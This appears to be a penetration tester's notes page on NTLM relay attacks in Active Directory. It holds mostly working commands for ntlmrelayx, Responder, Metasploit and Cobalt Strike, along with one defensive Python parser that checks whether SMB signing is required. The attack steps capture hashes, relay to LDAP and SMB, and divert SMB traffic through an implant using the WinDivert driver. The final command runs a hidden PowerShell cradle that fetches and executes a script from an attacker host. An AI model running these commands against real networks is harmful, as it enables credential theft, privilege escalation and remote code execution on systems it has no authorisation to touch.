- https://en.hackndo.com/ntlm-relay/
- https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/
- https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/
- https://www.secureauth.com/blog/playing-with-relayed-credentials/
- https://www.secureauth.com/blog/we-love-relaying-credentials-a-technical-guide-to-relaying-credentials-everywhere/
- https://intrinium.com/smb-relay-attack-tutorial/
- https://www.sans.org/blog/smb-relay-demystified-and-ntlmv2-pwnage-with-python/
- https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
- https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire
- https://www.blackhillsinfosec.com/an-smb-relay-race-how-to-exploit-llmnr-and-smb-message-signing-for-fun-and-profit/
- https://clement.notin.org/blog/2020/11/16/ntlm-relay-of-adws-connections-with-impacket/
- https://luemmelsec.github.io/Relaying-101/
- https://www.thehacker.recipes/active-directory-domain-services/movement/lm-and-ntlm/relay
- https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/
- https://www.fortalicesolutions.com/posts/keeping-up-with-the-ntlm-relay
- https://offsec.almond.consulting/ldap-relays-for-initial-foothold-in-dire-situations.html
- https://labs.nettitude.com/blog/network-relaying-abuse-windows-domain/
- https://xakep.ru/2023/04/07/ntlm-relay-guide/
- https://xakep.ru/2023/04/11/ntlm-relay-guide-2/
- [PDF] Coercions and Relays – The First Cred is the Deepest (Gabriel Prudhomme)
{% embed url="https://youtu.be/b0lLxLJKaRs" %}
{% file src="/.gitbook/assets/Lateral Movement using Credentials Relaying (taso_x).pdf" %}
Generate a relay list with CME and enumerate local admins while relaying:

```
$ cme smb 192.168.2.0/24 --gen-relay-list relay.txt
$ ntlmrelayx.py -tf relay.txt -smb2support --enum-local-admins -of net-ntlmv2 --no-http-server --no-wcf-server --no-raw-server
```
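As an added defender-side illustration (not part of the original notes, CME or impacket), the property `--gen-relay-list` selects on is the SecurityMode field of the SMB2 NEGOTIATE response: a host that sets SMB2_NEGOTIATE_SIGNING_REQUIRED cannot be relayed to over SMB, so an audit of that field is the same check run from the hardening side. The parser below decodes the field from a raw response; the sample packets are constructed, not captured.

```python
import struct

# SecurityMode flags of the SMB2 NEGOTIATE response (MS-SMB2 2.2.4)
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001  # header flag set on every response
SMB2_NEGOTIATE = 0x0000                  # command code


def negotiate_security_mode(packet: bytes) -> int:
    """Return SecurityMode from a raw SMB2 NEGOTIATE response.

    `packet` is the TCP payload: a 4-byte NetBIOS session header, the 64-byte
    SMB2 header, then the NEGOTIATE response body."""
    smb2 = packet[4:]
    if len(smb2) < 64 + 4 or smb2[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 message")
    command, flags = struct.unpack_from("<H2xI", smb2, 12)  # Command @12, Flags @16
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    structure_size, security_mode = struct.unpack_from("<HH", smb2, 64)
    if structure_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    return security_mode


def signing_required(packet: bytes) -> bool:
    return bool(negotiate_security_mode(packet) & SMB2_NEGOTIATE_SIGNING_REQUIRED)


def relayable_hosts(responses: dict) -> list:
    """Hosts whose NEGOTIATE response does not require signing: the population
    a relay list would contain and the one a hardening pass should fix."""
    return sorted(h for h, pkt in responses.items() if not signing_required(pkt))


def build_sample(security_mode: int) -> bytes:
    """Constructed (not captured) SMB 3.1.1 NEGOTIATE response with the given SecurityMode."""
    header = struct.pack("<4sHHIHHIIQIIQ16s", b"\xfeSMB", 64, 0, 0, SMB2_NEGOTIATE, 1,
                         SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, 0x0311, 0, b"\x00" * 16,
                       0, 0x800000, 0x800000, 0x800000, 0, 0, 0, 0, 0) + b"\x00"
    smb2 = header + body
    return b"\x00" + len(smb2).to_bytes(3, "big") + smb2  # NetBIOS session header
```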
Relay & catch hashes (via multi-relay):

```
$ smbserver.py -smb2support -port 8445 share `pwd`
$ ntlmrelayx.py -tf targets.txt -smb2support --no-http-server --no-wcf-server --no-raw-server
$ cat targets.txt
smb://10.10.13.37
smb://127.0.0.1:8445
```
{% hint style="info" %}
The easier way, though, is to combine the `-of/--output-file hashes.txt` and `-ntlmchallenge 1122334455667788` options, which save the captured hashes with a predefined challenge to a file while relaying.
{% endhint %}
Relay NTLM2 responses obtained from Responder's proxy authentication to LDAP(S) (Responder's HTTP server must be off):
{% embed url="https://twitter.com/theluemmel/status/1455099572305416197" %}
```
$ ntlmrelayx.py -t ldap(s)://DC01.megacorp.local --http-port 3128 [--add-computer] / [--delegate-access [--escalate-user 'PWNED-MACHINE$']] [-socks] --no-smb-server --no-wcf-server --no-raw-server --no-dump [--no-da --no-acl --no-validate-privs]
$ sudo ./Responder.py -I eth0 -wd -P -v
$ python scan.py MEGACORP/snovvcrash:'Passw0rd!'@192.168.1.11
$ python scan.py -target-file DCs.txt MEGACORP/snovvcrash:'Passw0rd!'@placeholder.xyz
```
- https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/
- https://github.com/pkb1s/SharpRelay
Divert incoming SMB traffic from Victim to Attacker's local port 445 through an elevated meterpreter session and relay it to Target via the MSF SOCKS server.

1. Add a static route to the Target through the 1st meterpreter session:

```
meterpreter > route add 192.168.1.11/32 1
```
2. Start the MSF SOCKS server:

```
msf > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf auxiliary(server/socks_proxy) > run -j
```
3. Forward reverse port 8445 on Victim to local port 445 on Attacker and start diverting incoming SMB traffic on Victim to Victim's local port 8445:

```
meterpreter > portfwd add -R -L 127.0.0.1 -l 445 -p 8445
meterpreter > cd C:\\Windows\\System32\\drivers
meterpreter > upload /home/snovvcrash/www/WinDivert64.sys
msf post(windows/manage/execute_dotnet_assembly) > set SESSION 1
msf post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE /home/snovvcrash/www/SharpRelay.exe
msf post(windows/manage/execute_dotnet_assembly) > set ARGUMENTS relaysvc "C:\Windows\System32\drivers\WinDivert64.sys" 445 8445
msf post(windows/manage/execute_dotnet_assembly) > run
```
4. Relay the diverted traffic to Target through SOCKS:

```
$ sudo proxychains4 -q ntlmrelayx.py -t smb://192.168.1.11 -smb2support
```

{% hint style="warning" %}
Once the driver has been run, it must be unloaded (or the host rebooted) before trying again. The fake service can be deleted with a PowerShell command:

```
PS > (sc.exe stop relaysvc) -and (sc.exe delete relaysvc)
```
{% endhint %}
Set up the SOCKS server and port forwarding, upload the WinDivert driver and configure redirection with PortBender:

```
beacon> socks 1080
beacon> rportfwd 8445 127.0.0.1 445
beacon> cd C:\Windows\System32\drivers
beacon> upload /home/snovvcrash/www/WinDivert64.sys
beacon> PortBender redirect 445 8445
```

Relay the planet:

```
$ sudo proxychains4 -q ntlmrelayx.py -t smb://192.168.1.11 -smb2support --no-http-server --no-wcf-server -c 'powershell -nop -w hidden -c "iex(new-object net.webclient).downloadstring(\"http://10.10.13.37:8080/pwn.ps1\")"'
```

Stop PortBender:

```
beacon> jobs
beacon> jobkill <JID>
beacon> kill <PID>
```